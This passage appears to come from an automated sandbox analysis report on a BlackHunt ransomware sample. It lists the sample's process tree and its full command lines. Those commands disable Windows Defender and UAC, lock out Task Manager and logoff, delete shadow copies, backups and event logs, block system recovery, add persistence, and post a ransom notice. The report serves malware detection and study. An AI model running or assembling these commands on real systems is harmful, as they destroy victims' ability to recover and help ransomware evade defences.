437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 113 PID 1660 wrote to memory of 3176 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 113 PID 2984 wrote to memory of 3648 2984 cmd.exe 170 PID 2984 wrote to memory of 3648 2984 cmd.exe 170 PID 1660 wrote to memory of 2688 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 119 PID 1660 wrote to memory of 2688 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 119 PID 3540 wrote to memory of 1732 3540 cmd.exe 117 PID 3540 wrote to memory of 1732 3540 cmd.exe 117 PID 1660 wrote to memory of 3004 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 120 PID 1660 wrote to memory of 3004 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 120 PID 1660 wrote to memory of 652 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 125 PID 1660 wrote to memory of 652 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 125 PID 4496 wrote to memory of 5036 4496 cmd.exe 124 PID 4496 wrote to memory of 5036 4496 cmd.exe 124 PID 1660 wrote to memory of 464 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 127 PID 1660 wrote to memory of 464 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 127 PID 1660 wrote to memory of 4936 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 136 PID 1660 wrote to memory of 4936 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 136 PID 1660 wrote to memory of 2328 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 132 PID 1660 wrote to memory of 2328 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 132 PID 2688 wrote to memory of 3168 2688 cmd.exe 130 PID 2688 wrote to memory of 3168 2688 cmd.exe 130 PID 5028 wrote to memory of 4616 5028 cmd.exe 134 PID 5028 wrote to memory of 4616 5028 cmd.exe 134 PID 3176 wrote to memory of 2964 3176 cmd.exe 141 PID 3176 wrote to memory of 2964 3176 cmd.exe 141 PID 1660 wrote to memory of 864 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 142 PID 1660 wrote to memory of 864 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe"C:\Users\Admin\AppData\Local\Temp\437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:3888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:60
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4936
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3888
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe" /F2⤵PID:3668
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe" /F3⤵
- Creates scheduled task(s)
PID:5196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2700
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1800
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4292
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1668
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3232
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5072
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5064
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4732
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7020
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:13568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:13468
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:15020
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:14616
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:14764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:14924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:15124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:14748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:15452
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:15292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15292 -s 14564⤵
- Program crash
PID:15400
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:15460
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:15052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe"2⤵PID:14684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:15480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14088
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:9000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:14384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:13984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:14228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:18356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:13524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4368
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:3648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:5036
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11764
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7016
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:17484
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6716
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:13628
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14192
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:15004
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:14420
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:14448
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:14640
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:14916
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:14944
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:15412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 15292 -ip 152921⤵PID:15356
-
